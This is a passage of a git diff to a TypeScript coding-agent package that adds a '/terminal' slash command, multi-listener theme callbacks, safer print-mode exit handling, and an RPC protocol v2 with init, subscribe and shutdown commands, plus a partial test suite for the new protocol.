(text === "/export" || text.startsWith("/export ")) { await handleExportCommand(text, ctx); return true; } @@ -220,6 +223,18 @@ export async function dispatchSlashCommand( await ctx.shutdown(); 
return true; } + if (text === "/terminal" || text.startsWith("/terminal ")) { + const command = text.startsWith("/terminal ") ? text.slice(10).trim() : ""; + if (!command) { + ctx.showWarning("Usage: /terminal (e.g. /terminal ping -c3 1.1.1.1)"); + return true; + } + // Run in the user's login shell ($SHELL -l -c) so PATH additions + // and env vars from shell profiles (.zprofile/.profile) are available. + // Note: shell aliases are not loaded (requires -i which has side effects). + await ctx.handleBashCommand(command, { loginShell: true }); + return true; + } return false; } diff --git a/packages/pi-coding-agent/src/modes/interactive/theme/theme.ts b/packages/pi-coding-agent/src/modes/interactive/theme/theme.ts index db1a524a0..763b22734 100644 --- a/packages/pi-coding-agent/src/modes/interactive/theme/theme.ts +++ b/packages/pi-coding-agent/src/modes/interactive/theme/theme.ts @@ -663,7 +663,7 @@ function setGlobalTheme(t: Theme): void { let currentThemeName: string | undefined; let themeWatcher: fs.FSWatcher | undefined; -let onThemeChangeCallback: (() => void) | undefined; +const onThemeChangeCallbacks = new Set<() => void>(); const registeredThemes = new Map(); export function setRegisteredThemes(themes: Theme[]): void { @@ -698,9 +698,7 @@ export function setTheme(name: string, enableWatcher: boolean = false): { succes if (enableWatcher) { startThemeWatcher(); } - if (onThemeChangeCallback) { - onThemeChangeCallback(); - } + onThemeChangeCallbacks.forEach(cb => cb()); return { success: true }; } catch (error) { // Theme is invalid - fall back to dark theme @@ -718,13 +716,12 @@ export function setThemeInstance(themeInstance: Theme): void { setGlobalTheme(themeInstance); currentThemeName = ""; stopThemeWatcher(); // Can't watch a direct instance - if (onThemeChangeCallback) { - onThemeChangeCallback(); - } + onThemeChangeCallbacks.forEach(cb => cb()); } -export function onThemeChange(callback: () => void): void { - onThemeChangeCallback = callback; +export 
function onThemeChange(callback: () => void): () => void { + onThemeChangeCallbacks.add(callback); + return () => { onThemeChangeCallbacks.delete(callback); }; } function startThemeWatcher(): void { @@ -755,10 +752,8 @@ function startThemeWatcher(): void { try { // Reload the theme setGlobalTheme(loadTheme(currentThemeName!)); - // Notify callback (to invalidate UI) - if (onThemeChangeCallback) { - onThemeChangeCallback(); - } + // Notify callbacks (to invalidate UI) + onThemeChangeCallbacks.forEach(cb => cb()); } catch (_error) { // Ignore errors (file might be in invalid state while being edited) } @@ -773,9 +768,7 @@ function startThemeWatcher(): void { themeWatcher.close(); themeWatcher = undefined; } - if (onThemeChangeCallback) { - onThemeChangeCallback(); - } + onThemeChangeCallbacks.forEach(cb => cb()); } }, 100); } diff --git a/packages/pi-coding-agent/src/modes/interactive/theme/themes.ts b/packages/pi-coding-agent/src/modes/interactive/theme/themes.ts index c92763543..f1459a0bb 100644 --- a/packages/pi-coding-agent/src/modes/interactive/theme/themes.ts +++ b/packages/pi-coding-agent/src/modes/interactive/theme/themes.ts @@ -23,7 +23,7 @@ const dark: ThemeJson = { blue: "#5f87ff", green: "#b5bd68", red: "#cc6666", - yellow: "#ffff00", + yellow: "#e6b800", gray: "#808080", dimGray: "#666666", darkGray: "#505050", @@ -113,6 +113,7 @@ const light: ThemeJson = { green: "#588458", red: "#aa5555", yellow: "#9a7326", + warning: "#7a5a00", mediumGray: "#6c6c6c", dimGray: "#767676", lightGray: "#b0b0b0", @@ -130,7 +131,7 @@ const light: ThemeJson = { borderMuted: "lightGray", success: "green", error: "red", - warning: "yellow", + warning: "warning", muted: "mediumGray", dim: "dimGray", text: "", diff --git a/packages/pi-coding-agent/src/modes/print-mode.ts b/packages/pi-coding-agent/src/modes/print-mode.ts index a2557f99b..a44266450 100644 --- a/packages/pi-coding-agent/src/modes/print-mode.ts +++ b/packages/pi-coding-agent/src/modes/print-mode.ts @@ -45,52 +45,62 
@@ export async function runPrintMode(session: AgentSession, options: PrintModeOpti }); // Always subscribe to enable session persistence via _handleAgentEvent - session.subscribe((event) => { + const unsubscribe = session.subscribe((event) => { // In JSON mode, output all events if (mode === "json") { console.log(JSON.stringify(event)); } }); - // Send initial message with attachments - if (initialMessage) { - await session.prompt(initialMessage, { images: initialImages }); - } + let exitCode = 0; - // Send remaining messages - for (const message of messages) { - await session.prompt(message); - } + try { + // Send initial message with attachments + if (initialMessage) { + await session.prompt(initialMessage, { images: initialImages }); + } - // In text mode, output final response - if (mode === "text") { - const state = session.state; - const lastMessage = state.messages[state.messages.length - 1]; + // Send remaining messages + for (const message of messages) { + await session.prompt(message); + } - if (lastMessage?.role === "assistant") { - const assistantMsg = lastMessage as AssistantMessage; + // In text mode, output final response + if (mode === "text") { + const state = session.state; + const lastMessage = state.messages[state.messages.length - 1]; - // Check for error/aborted - if (assistantMsg.stopReason === "error" || assistantMsg.stopReason === "aborted") { - console.error(assistantMsg.errorMessage || `Request ${assistantMsg.stopReason}`); - process.exit(1); - } + if (lastMessage?.role === "assistant") { + const assistantMsg = lastMessage as AssistantMessage; - // Output text content - for (const content of assistantMsg.content) { - if (content.type === "text") { - console.log(content.text); + // Check for error/aborted + if (assistantMsg.stopReason === "error" || assistantMsg.stopReason === "aborted") { + console.error(assistantMsg.errorMessage || `Request ${assistantMsg.stopReason}`); + exitCode = 1; + } else { + // Output text content + for (const 
content of assistantMsg.content) { + if (content.type === "text") { + console.log(content.text); + } + } } } } + + // Ensure stdout is fully flushed before returning + // This prevents race conditions where the process exits before all output is written + await new Promise((resolve, reject) => { + process.stdout.write("", (err) => { + if (err) reject(err); + else resolve(); + }); + }); + } finally { + unsubscribe(); } - // Ensure stdout is fully flushed before returning - // This prevents race conditions where the process exits before all output is written - await new Promise((resolve, reject) => { - process.stdout.write("", (err) => { - if (err) reject(err); - else resolve(); - }); - }); + if (exitCode !== 0) { + process.exit(exitCode); + } } diff --git a/packages/pi-coding-agent/src/modes/rpc/jsonl.ts b/packages/pi-coding-agent/src/modes/rpc/jsonl.ts index 8962c7340..5392defef 100644 --- a/packages/pi-coding-agent/src/modes/rpc/jsonl.ts +++ b/packages/pi-coding-agent/src/modes/rpc/jsonl.ts @@ -48,11 +48,17 @@ export function attachJsonlLineReader(stream: Readable, onLine: (line: string) = } }; + const onError = (_err: Error) => { + // Stream errors are non-fatal for JSONL reading + }; + stream.on("data", onData); stream.on("end", onEnd); + stream.on("error", onError); return () => { stream.off("data", onData); stream.off("end", onEnd); + stream.off("error", onError); }; } diff --git a/packages/pi-coding-agent/src/modes/rpc/remote-terminal.ts b/packages/pi-coding-agent/src/modes/rpc/remote-terminal.ts index 84f78f950..4dda9b0c9 100644 --- a/packages/pi-coding-agent/src/modes/rpc/remote-terminal.ts +++ b/packages/pi-coding-agent/src/modes/rpc/remote-terminal.ts @@ -49,6 +49,12 @@ export class RemoteTerminal implements Terminal { return this._rows; } + get isTTY(): boolean { + // RemoteTerminal renders to a browser-based terminal emulator via + // the RPC bridge — it behaves like a real TTY for rendering purposes. 
+ return true; + } + get kittyProtocolActive(): boolean { return false; } diff --git a/packages/pi-coding-agent/src/modes/rpc/rpc-client.ts b/packages/pi-coding-agent/src/modes/rpc/rpc-client.ts index a3f91ecc4..e776bd8ad 100644 --- a/packages/pi-coding-agent/src/modes/rpc/rpc-client.ts +++ b/packages/pi-coding-agent/src/modes/rpc/rpc-client.ts @@ -11,7 +11,7 @@ import type { SessionStats } from "../../core/agent-session.js"; import type { BashResult } from "../../core/bash-executor.js"; import type { CompactionResult } from "../../core/compaction/index.js"; import { attachJsonlLineReader, serializeJsonLine } from "./jsonl.js"; -import type { RpcCommand, RpcResponse, RpcSessionState, RpcSlashCommand } from "./rpc-types.js"; +import type { RpcCommand, RpcInitResult, RpcResponse, RpcSessionState, RpcSlashCommand } from "./rpc-types.js"; // ============================================================================ // Types @@ -54,6 +54,7 @@ export type RpcEventListener = (event: AgentEvent) => void; export class RpcClient { private process: ChildProcess | null = null; private stopReadingStdout: (() => void) | null = null; + private _stderrHandler?: (data: Buffer) => void; private eventListeners: RpcEventListener[] = []; private pendingRequests: Map void; reject: (error: Error) => void }> = new Map(); @@ -90,9 +91,10 @@ export class RpcClient { }); // Collect stderr for debugging - this.process.stderr?.on("data", (data) => { + this._stderrHandler = (data: Buffer) => { this.stderr += data.toString(); - }); + }; + this.process.stderr?.on("data", this._stderrHandler); // Set up strict JSONL reader for stdout. 
this.stopReadingStdout = attachJsonlLineReader(this.process.stdout!, (line) => { @@ -127,6 +129,10 @@ export class RpcClient { this.stopReadingStdout?.(); this.stopReadingStdout = null; + if (this._stderrHandler) { + this.process.stderr?.removeListener("data", this._stderrHandler); + this._stderrHandler = undefined; + } this.process.kill("SIGTERM"); // Wait for process to exit @@ -392,6 +398,59 @@ export class RpcClient { return this.getData<{ commands: RpcSlashCommand[] }>(response).commands; } + /** + * Send a UI response to a pending extension_ui_request. + * Fire-and-forget — no request/response correlation. + */ + sendUIResponse(id: string, response: { value?: string; values?: string[]; confirmed?: boolean; cancelled?: boolean }): void { + if (!this.process?.stdin) { + throw new Error("Client not started"); + } + this.process.stdin.write(serializeJsonLine({ + type: "extension_ui_response", + id, + ...response, + })); + } + + /** + * Initialize a v2 protocol session. Must be sent as the first command. + * Returns the negotiated protocol version, session ID, and server capabilities. + */ + async init(options?: { clientId?: string }): Promise { + const response = await this.send({ type: "init", protocolVersion: 2, clientId: options?.clientId }); + return this.getData(response); + } + + /** + * Request a graceful shutdown of the agent process. + * Waits for the response before the process exits. + */ + async shutdown(): Promise { + await this.send({ type: "shutdown" }); + // Wait for process to exit after shutdown acknowledgment + if (this.process) { + await new Promise((resolve) => { + const timeout = setTimeout(() => { + this.process?.kill("SIGKILL"); + resolve(); + }, 5000); + this.process?.on("exit", () => { + clearTimeout(timeout); + resolve(); + }); + }); + } + } + + /** + * Subscribe to specific event types (v2 only). + * Pass ["*"] to receive all events, or a list of event type strings to filter. 
+ */ + async subscribe(events: string[]): Promise { + await this.send({ type: "subscribe", events }); + } + // ========================================================================= // Helpers // ========================================================================= @@ -482,8 +541,6 @@ export class RpcClient { const fullCommand = { ...command, id } as RpcCommand; return new Promise((resolve, reject) => { - this.pendingRequests.set(id, { resolve, reject }); - const timeout = setTimeout(() => { this.pendingRequests.delete(id); reject(new Error(`Timeout waiting for response to ${command.type}. Stderr: ${this.stderr}`)); diff --git a/packages/pi-coding-agent/src/modes/rpc/rpc-mode.ts b/packages/pi-coding-agent/src/modes/rpc/rpc-mode.ts index e15c81ae3..f2f8fbe4c 100644 --- a/packages/pi-coding-agent/src/modes/rpc/rpc-mode.ts +++ b/packages/pi-coding-agent/src/modes/rpc/rpc-mode.ts @@ -27,6 +27,7 @@ import type { RpcCommand, RpcExtensionUIRequest, RpcExtensionUIResponse, + RpcInitResult, RpcResponse, RpcSessionState, RpcSlashCommand, @@ -37,8 +38,11 @@ export type { RpcCommand, RpcExtensionUIRequest, RpcExtensionUIResponse, + RpcInitResult, + RpcProtocolVersion, RpcResponse, RpcSessionState, + RpcV2Event, } from "./rpc-types.js"; /** @@ -74,6 +78,16 @@ export async function runRpcMode(session: AgentSession): Promise { // Shutdown request flag let shutdownRequested = false; + // v2 protocol version detection state + let protocolVersion: 1 | 2 = 1; + let protocolLocked = false; + + // v2 runId threading: tracks the current execution run + let currentRunId: string | null = null; + + // v2 event filtering: null = no filter (all events); Set = only listed event types + let eventFilter: Set | null = null; + const embeddedTerminalEnabled = process.env.GSD_WEB_BRIDGE_TUI === "1"; const remoteTerminal = embeddedTerminalEnabled ? 
new RemoteTerminal({ @@ -424,8 +438,56 @@ export async function runRpcMode(session: AgentSession): Promise { void extensionsReadyPromise; // Output all agent events as JSON - session.subscribe((event) => { - output(event); + const unsubscribe = session.subscribe((event) => { + // v2: emit synthesized events before the regular event + if (protocolVersion === 2) { + // cost_update on assistant message_end + if (event.type === "message_end" && event.message.role === "assistant" && currentRunId) { + const stats = session.getSessionStats(); + const costUpdate = { + type: "cost_update" as const, + runId: currentRunId, + turnCost: session.getLastTurnCost(), + cumulativeCost: stats.cost, + tokens: { + input: stats.tokens.input, + output: stats.tokens.output, + cacheRead: stats.tokens.cacheRead, + cacheWrite: stats.tokens.cacheWrite, + }, + }; + if (!eventFilter || eventFilter.has("cost_update")) { + output(costUpdate); + } + } + + // execution_complete on agent_end + if (event.type === "agent_end" && currentRunId) { + const stats = session.getSessionStats(); + const completionEvent = { + type: "execution_complete" as const, + runId: currentRunId, + status: "completed" as const, + stats, + }; + if (!eventFilter || eventFilter.has("execution_complete")) { + output(completionEvent); + } + currentRunId = null; + } + } + + // Apply event filter (v2 only, applies to agent session events only) + if (protocolVersion === 2 && eventFilter && !eventFilter.has(event.type)) { + return; + } + + // Emit the regular event, with runId injection in v2 mode + if (protocolVersion === 2 && currentRunId) { + output({ ...event, runId: currentRunId }); + } else { + output(event); + } }); // Handle a single command @@ -438,6 +500,9 @@ export async function runRpcMode(session: AgentSession): Promise { // ================================================================= case "prompt": { + // v2: generate runId for execution tracking + const runId = protocolVersion === 2 ? 
crypto.randomUUID() : undefined; + if (runId) currentRunId = runId; // Don't await - events will stream // Extension commands are executed immediately, file prompt templates are expanded // If streaming and streamingBehavior specified, queues via steer/followUp @@ -448,17 +513,23 @@ export async function runRpcMode(session: AgentSession): Promise { source: "rpc", }) .catch((e) => output(error(id, "prompt", e.message))); - return success(id, "prompt"); + return { id, type: "response", command: "prompt", success: true, ...(runId && { runId }) } as RpcResponse; } case "steer": { + // v2: generate runId for execution tracking + const runId = protocolVersion === 2 ? crypto.randomUUID() : undefined; + if (runId) currentRunId = runId; await session.steer(command.message, command.images); - return success(id, "steer"); + return { id, type: "response", command: "steer", success: true, ...(runId && { runId }) } as RpcResponse; } case "follow_up": { + // v2: generate runId for execution tracking + const runId = protocolVersion === 2 ? 
crypto.randomUUID() : undefined; + if (runId) currentRunId = runId; await session.followUp(command.message, command.images); - return success(id, "follow_up"); + return { id, type: "response", command: "follow_up", success: true, ...(runId && { runId }) } as RpcResponse; } case "abort": { @@ -709,9 +780,31 @@ export async function runRpcMode(session: AgentSession): Promise { return success(id, "terminal_redraw"); } + // ================================================================= + // v2 Protocol: subscribe + // ================================================================= + + case "subscribe": { + if (command.events.includes("*")) { + eventFilter = null; // wildcard = all events + } else { + eventFilter = new Set(command.events); + } + return success(id, "subscribe"); + } + + // ================================================================= + // v2 Protocol: shutdown + // ================================================================= + + case "shutdown": { + shutdownRequested = true; + return success(id, "shutdown"); + } + default: { - const unknownCommand = command as { type: string }; - return error(undefined, unknownCommand.type, `Unknown command: ${unknownCommand.type}`); + const unknownCommand = command as { type: string; id?: string }; + return error(unknownCommand.id, unknownCommand.type, `Unknown command: ${unknownCommand.type}`); } } }; @@ -730,6 +823,7 @@ export async function runRpcMode(session: AgentSession): Promise { await currentRunner.emit({ type: "session_shutdown" }); } + unsubscribe(); embeddedInteractiveMode?.stop(); detachInput(); process.stdin.pause(); @@ -740,7 +834,7 @@ export async function runRpcMode(session: AgentSession): Promise { try { const parsed = JSON.parse(line); - // Handle extension UI responses + // Handle extension UI responses (bypass protocol detection) if (parsed.type === "extension_ui_response") { const response = parsed as RpcExtensionUIResponse; const pending = pendingExtensionRequests.get(response.id); 
@@ -751,8 +845,33 @@ export async function runRpcMode(session: AgentSession): Promise { return; } - // Handle regular commands const command = parsed as RpcCommand; + + // Protocol version detection: first non-UI-response command locks the version + if (!protocolLocked) { + protocolLocked = true; + if (command.type === "init") { + protocolVersion = 2; + const initResult: RpcInitResult = { + protocolVersion: 2, + sessionId: session.sessionId, + capabilities: { + events: ["execution_complete", "cost_update"], + commands: ["init", "shutdown", "subscribe"], + }, + }; + output(success(command.id, "init", initResult)); + return; + } + // Non-init first message: lock to v1, fall through to normal handling + protocolVersion = 1; + } else if (command.type === "init") { + // Already locked — reject re-init + output(error(command.id, "init", "Protocol version already locked. init must be the first command.")); + return; + } + + // Handle regular commands const response = await handleCommand(command); output(response); diff --git a/packages/pi-coding-agent/src/modes/rpc/rpc-protocol-v2.test.ts b/packages/pi-coding-agent/src/modes/rpc/rpc-protocol-v2.test.ts new file mode 100644 index 000000000..e08161186 --- /dev/null +++ b/packages/pi-coding-agent/src/modes/rpc/rpc-protocol-v2.test.ts @@ -0,0 +1,971 @@ +/** + * RPC Protocol v2 test suite. + * + * Tests v1 backward compatibility, v2 init handshake, protocol locking, + * v2 feature type shapes, and RpcClient command serialization against + * mock child processes using PassThrough streams. 
+ */ + +import { describe, it, beforeEach, afterEach, mock } from "node:test"; +import assert from "node:assert/strict"; +import { PassThrough } from "node:stream"; +import { attachJsonlLineReader, serializeJsonLine } from "./jsonl.js"; +import type { + RpcCommand, + RpcResponse, + RpcInitResult, + RpcExecutionCompleteEvent, + RpcCostUpdateEvent, + RpcV2Event, + RpcProtocolVersion, + RpcSessionState, +} from "./rpc-types.js"; + +// ============================================================================ +// Helpers +// ============================================================================ + +/** Collect JSONL output lines from a stream */ +function collectLines(stream: PassThrough): { lines: unknown[]; detach: () => void } { + const lines: unknown[] = []; + const detach = attachJsonlLineReader(stream, (line) => { + try { + lines.push(JSON.parse(line)); + } catch { + // skip non-JSON lines + } + }); + return { lines, detach }; +} + +/** Write a command as JSONL to a writable stream and wait for drain */ +function writeLine(stream: PassThrough, obj: unknown): void { + stream.write(serializeJsonLine(obj)); +} + +/** + * Create a mock "child process" with piped stdin/stdout. + * clientStdin → data flows into the "server" (from the client's perspective, this is what the client writes to) + * clientStdout ← data flows out of the "server" (from the client's perspective, this is what the client reads from) + * + * The test acts as the "server": read from clientStdin, write to clientStdout. 
+ */ +function createMockProcess() { + // Client writes to this → server reads from it + const clientStdin = new PassThrough(); + // Server writes to this → client reads from it + const clientStdout = new PassThrough(); + + return { clientStdin, clientStdout }; +} + +/** Wait a tick for async handlers to process */ +function tick(ms = 10): Promise { + return new Promise((resolve) => setTimeout(resolve, ms)); +} + +// ============================================================================ +// JSONL utilities +// ============================================================================ + +describe("JSONL utilities", () => { + it("serializeJsonLine produces newline-terminated JSON", () => { + const result = serializeJsonLine({ type: "test", value: 42 }); + assert.equal(result, '{"type":"test","value":42}\n'); + }); + + it("serializeJsonLine handles nested objects", () => { + const result = serializeJsonLine({ a: { b: [1, 2, 3] } }); + assert.ok(result.endsWith("\n")); + const parsed = JSON.parse(result.trim()); + assert.deepEqual(parsed, { a: { b: [1, 2, 3] } }); + }); + + it("attachJsonlLineReader splits on LF only", async () => { + const stream = new PassThrough(); + const { lines, detach } = collectLines(stream); + + stream.write('{"a":1}\n{"b":2}\n'); + await tick(); + + assert.equal(lines.length, 2); + assert.deepEqual(lines[0], { a: 1 }); + assert.deepEqual(lines[1], { b: 2 }); + detach(); + }); + + it("attachJsonlLineReader handles partial writes", async () => { + const stream = new PassThrough(); + const { lines, detach } = collectLines(stream); + + stream.write('{"partial":'); + await tick(); + assert.equal(lines.length, 0); + + stream.write('"value"}\n'); + await tick(); + assert.equal(lines.length, 1); + assert.deepEqual(lines[0], { partial: "value" }); + detach(); + }); + + it("attachJsonlLineReader handles CR+LF", async () => { + const stream = new PassThrough(); + const { lines, detach } = collectLines(stream); + + 
stream.write('{"cr":"lf"}\r\n'); + await tick(); + assert.equal(lines.length, 1); + assert.deepEqual(lines[0], { cr: "lf" }); + detach(); + }); + + it("detach stops line delivery", async () => { + const stream = new PassThrough(); + const { lines, detach } = collectLines(stream); + + stream.write('{"before":1}\n'); + await tick(); + assert.equal(lines.length, 1); + + detach(); + + stream.write('{"after":2}\n'); + await tick(); + // Should still be 1 since we detached + assert.equal(lines.length, 1); + }); +}); + +// ============================================================================ +// v2 type shape assertions +// ============================================================================ + +describe("v2 type shapes", () => { + it("RpcInitResult has required fields", () => { + const initResult: RpcInitResult = { + protocolVersion: 2, + sessionId: "test-session-123", + capabilities: { + events: ["execution_complete", "cost_update"], + commands: ["init", "shutdown", "subscribe"], + }, + }; + assert.equal(initResult.protocolVersion, 2); + assert.ok(typeof initResult.sessionId === "string"); + assert.ok(Array.isArray(initResult.capabilities.events)); + assert.ok(Array.isArray(initResult.capabilities.commands)); + assert.ok(initResult.capabilities.events.includes("execution_complete")); + assert.ok(initResult.capabilities.events.includes("cost_update")); + assert.ok(initResult.capabilities.commands.includes("init")); + assert.ok(initResult.capabilities.commands.includes("shutdown")); + assert.ok(initResult.capabilities.commands.includes("subscribe")); + }); + + it("RpcExecutionCompleteEvent matches expected shape", () => { + const event: RpcExecutionCompleteEvent = { + type: "execution_complete", + runId: "run-abc-123", + status: "completed", + stats: { + cost: 0.05, + turns: 3, + duration: 12000, + tokens: { input: 1000, output: 500, cacheRead: 200, cacheWrite: 100 }, + } as any, // SessionStats is complex, we just verify shape + }; + 
assert.equal(event.type, "execution_complete"); + assert.ok(typeof event.runId === "string"); + assert.ok(["completed", "error", "cancelled"].includes(event.status)); + assert.ok(event.stats !== undefined); + }); + + it("RpcExecutionCompleteEvent supports error status with reason", () => { + const event: RpcExecutionCompleteEvent = { + type: "execution_complete", + runId: "run-err-456", + status: "error", + reason: "API rate limit exceeded", + stats: {} as any, + }; + assert.equal(event.status, "error"); + assert.equal(event.reason, "API rate limit exceeded"); + }); + + it("RpcCostUpdateEvent matches expected shape", () => { + const event: RpcCostUpdateEvent = { + type: "cost_update", + runId: "run-cost-789", + turnCost: 0.01, + cumulativeCost: 0.05, + tokens: { + input: 500, + output: 200, + cacheRead: 100, + cacheWrite: 50, + }, + }; + assert.equal(event.type, "cost_update"); + assert.ok(typeof event.runId === "string"); + assert.ok(typeof event.turnCost === "number"); + assert.ok(typeof event.cumulativeCost === "number"); + assert.ok(typeof event.tokens.input === "number"); + assert.ok(typeof event.tokens.output === "number"); + assert.ok(typeof event.tokens.cacheRead === "number"); + assert.ok(typeof event.tokens.cacheWrite === "number"); + }); + + it("RpcV2Event discriminated union resolves by type field", () => { + const events: RpcV2Event[] = [ + { + type: "execution_complete", + runId: "r1", + status: "completed", + stats: {} as any, + }, + { + type: "cost_update", + runId: "r2", + turnCost: 0.01, + cumulativeCost: 0.03, + tokens: { input: 100, output: 50, cacheRead: 10, cacheWrite: 5 }, + }, + ]; + + for (const event of events) { + if (event.type === "execution_complete") { + // TypeScript narrows to RpcExecutionCompleteEvent + assert.ok("status" in event); + assert.ok("stats" in event); + } else if (event.type === "cost_update") { + // TypeScript narrows to RpcCostUpdateEvent + assert.ok("turnCost" in event); + assert.ok("tokens" in event); + } else { + 
assert.fail(`Unexpected event type: ${(event as any).type}`); + } + } + }); + + it("RpcProtocolVersion is 1 or 2", () => { + const v1: RpcProtocolVersion = 1; + const v2: RpcProtocolVersion = 2; + assert.equal(v1, 1); + assert.equal(v2, 2); + }); + + it("v2 prompt response includes optional runId field", () => { + const v1Response: RpcResponse = { + id: "1", + type: "response", + command: "prompt", + success: true, + }; + assert.equal(v1Response.success, true); + assert.equal((v1Response as any).runId, undefined); + + const v2Response: RpcResponse = { + id: "2", + type: "response", + command: "prompt", + success: true, + runId: "run-123", + }; + assert.equal(v2Response.success, true); + assert.equal((v2Response as any).runId, "run-123"); + }); + + it("v2 command types are present in RpcCommand union", () => { + // These compile — that's the actual test. Runtime verification: + const initCmd: RpcCommand = { type: "init", protocolVersion: 2 }; + const shutdownCmd: RpcCommand = { type: "shutdown" }; + const subscribeCmd: RpcCommand = { type: "subscribe", events: ["agent_end"] }; + + assert.equal(initCmd.type, "init"); + assert.equal(shutdownCmd.type, "shutdown"); + assert.equal(subscribeCmd.type, "subscribe"); + }); + + it("init command supports optional clientId", () => { + const cmd: RpcCommand = { type: "init", protocolVersion: 2, clientId: "my-client" }; + assert.equal(cmd.type, "init"); + if (cmd.type === "init") { + assert.equal(cmd.clientId, "my-client"); + } + }); + + it("shutdown command supports optional graceful flag", () => { + const cmd: RpcCommand = { type: "shutdown", graceful: true }; + if (cmd.type === "shutdown") { + assert.equal(cmd.graceful, true); + } + }); + + it("v2 response types include init, shutdown, subscribe", () => { + const initResp: RpcResponse = { + type: "response", + command: "init", + success: true, + data: { + protocolVersion: 2, + sessionId: "s1", + capabilities: { events: [], commands: [] }, + }, + }; + const shutdownResp: 
RpcResponse = { + type: "response", + command: "shutdown", + success: true, + }; + const subscribeResp: RpcResponse = { + type: "response", + command: "subscribe", + success: true, + }; + + assert.equal(initResp.command, "init"); + assert.equal(shutdownResp.command, "shutdown"); + assert.equal(subscribeResp.command, "subscribe"); + }); +}); + +// ============================================================================ +// v1 backward compatibility +// ============================================================================ + +describe("v1 backward compatibility — command shapes", () => { + it("v1 prompt command has no protocolVersion or runId", () => { + const cmd: RpcCommand = { type: "prompt", message: "hello" }; + assert.equal(cmd.type, "prompt"); + assert.equal((cmd as any).protocolVersion, undefined); + assert.equal((cmd as any).runId, undefined); + }); + + it("v1 get_state response has no v2 fields", () => { + const state: RpcSessionState = { + thinkingLevel: "medium", + isStreaming: false, + isCompacting: false, + steeringMode: "all", + followUpMode: "all", + sessionId: "test-id", + autoCompactionEnabled: true, + autoRetryEnabled: false, + retryInProgress: false, + retryAttempt: 0, + messageCount: 0, + pendingMessageCount: 0, + extensionsReady: true, + }; + // v1 state should not include any v2-specific fields + assert.equal((state as any).protocolVersion, undefined); + assert.equal((state as any).runId, undefined); + }); + + it("v1 prompt response has no runId", () => { + const resp: RpcResponse = { + id: "1", + type: "response", + command: "prompt", + success: true, + }; + assert.equal(resp.success, true); + // runId is optional; in v1 mode it won't be present + assert.equal((resp as any).runId, undefined); + }); + + it("error response shape is consistent across v1 and v2", () => { + const errResp: RpcResponse = { + id: "err-1", + type: "response", + command: "init", + success: false, + error: "Protocol version already locked. 
init must be the first command.", + }; + assert.equal(errResp.success, false); + if (!errResp.success) { + assert.ok(typeof errResp.error === "string"); + assert.ok(errResp.error.length > 0); + } + }); +}); + +// ============================================================================ +// RpcClient command serialization tests (mock process) +// ============================================================================ + +describe("RpcClient command serialization", () => { + // We import the class dynamically to avoid the full module graph at test time. + // Instead we test the protocol framing directly — what gets written to stdin and + // what comes back from stdout — using PassThrough streams. + + it("init command serializes correctly", () => { + const cmd = { id: "req_1", type: "init", protocolVersion: 2 }; + const serialized = serializeJsonLine(cmd); + const parsed = JSON.parse(serialized); + assert.equal(parsed.type, "init"); + assert.equal(parsed.protocolVersion, 2); + assert.equal(parsed.id, "req_1"); + }); + + it("init command with clientId serializes correctly", () => { + const cmd = { id: "req_1", type: "init", protocolVersion: 2, clientId: "test-client" }; + const serialized = serializeJsonLine(cmd); + const parsed = JSON.parse(serialized); + assert.equal(parsed.clientId, "test-client"); + }); + + it("shutdown command serializes correctly", () => { + const cmd = { id: "req_2", type: "shutdown" }; + const serialized = serializeJsonLine(cmd); + const parsed = JSON.parse(serialized); + assert.equal(parsed.type, "shutdown"); + assert.equal(parsed.id, "req_2"); + }); + + it("subscribe command serializes correctly with event list", () => { + const cmd = { id: "req_3", type: "subscribe", events: ["agent_end", "cost_update"] }; + const serialized = serializeJsonLine(cmd); + const parsed = JSON.parse(serialized); + assert.equal(parsed.type, "subscribe"); + assert.deepEqual(parsed.events, ["agent_end", "cost_update"]); + }); + + it("subscribe command with 
wildcard serializes correctly", () => { + const cmd = { id: "req_4", type: "subscribe", events: ["*"] }; + const serialized = serializeJsonLine(cmd); + const parsed = JSON.parse(serialized); + assert.deepEqual(parsed.events, ["*"]); + }); + + it("subscribe command with empty array serializes correctly", () => { + const cmd = { id: "req_5", type: "subscribe", events: [] as string[] }; + const serialized = serializeJsonLine(cmd); + const parsed = JSON.parse(serialized); + assert.deepEqual(parsed.events, []); + }); + + it("sendUIResponse serializes correct JSONL", () => { + const response = { + type: "extension_ui_response", + id: "ui-req-123", + value: "test-value", + }; + const serialized = serializeJsonLine(response); + const parsed = JSON.parse(serialized); + assert.equal(parsed.type, "extension_ui_response"); + assert.equal(parsed.id, "ui-req-123"); + assert.equal(parsed.value, "test-value"); + }); + + it("sendUIResponse with cancelled flag serializes correctly", () => { + const response = { + type: "extension_ui_response", + id: "ui-req-456", + cancelled: true, + }; + const serialized = serializeJsonLine(response); + const parsed = JSON.parse(serialized); + assert.equal(parsed.type, "extension_ui_response"); + assert.equal(parsed.cancelled, true); + }); + + it("sendUIResponse with confirmed flag serializes correctly", () => { + const response = { + type: "extension_ui_response", + id: "ui-req-789", + confirmed: true, + }; + const serialized = serializeJsonLine(response); + const parsed = JSON.parse(serialized); + assert.equal(parsed.confirmed, true); + }); + + it("sendUIResponse with multiple values serializes correctly", () => { + const response = { + type: "extension_ui_response", + id: "ui-req-multi", + values: ["opt-a", "opt-b"], + }; + const serialized = serializeJsonLine(response); + const parsed = JSON.parse(serialized); + assert.deepEqual(parsed.values, ["opt-a", "opt-b"]); + }); + + it("prompt command with runId in v2 response", () => { + const response 
= { + id: "req_10", + type: "response", + command: "prompt", + success: true, + runId: "run-uuid-abc", + }; + const serialized = serializeJsonLine(response); + const parsed = JSON.parse(serialized); + assert.equal(parsed.runId, "run-uuid-abc"); + assert.equal(parsed.command, "prompt"); + assert.equal(parsed.success, true); + }); +}); + +// ============================================================================ +// Client ↔ Mock server integration (PassThrough streams) +// ============================================================================ + +describe("Client ↔ Mock server protocol exchange", () => { + let clientStdin: PassThrough; + let clientStdout: PassThrough; + + beforeEach(() => { + const mockProc = createMockProcess(); + clientStdin = mockProc.clientStdin; + clientStdout = mockProc.clientStdout; + }); + + afterEach(() => { + clientStdin.destroy(); + clientStdout.destroy(); + }); + + it("init handshake: client writes init, server responds with init_result", async () => { + // Collect what the client would write + const { lines: clientWrites, detach: detachStdin } = collectLines(clientStdin); + + // Client sends init command + writeLine(clientStdin, { id: "req_1", type: "init", protocolVersion: 2 }); + await tick(); + + assert.equal(clientWrites.length, 1); + const initCmd = clientWrites[0] as any; + assert.equal(initCmd.type, "init"); + assert.equal(initCmd.protocolVersion, 2); + + // Server responds with init_result + const initResult: RpcInitResult = { + protocolVersion: 2, + 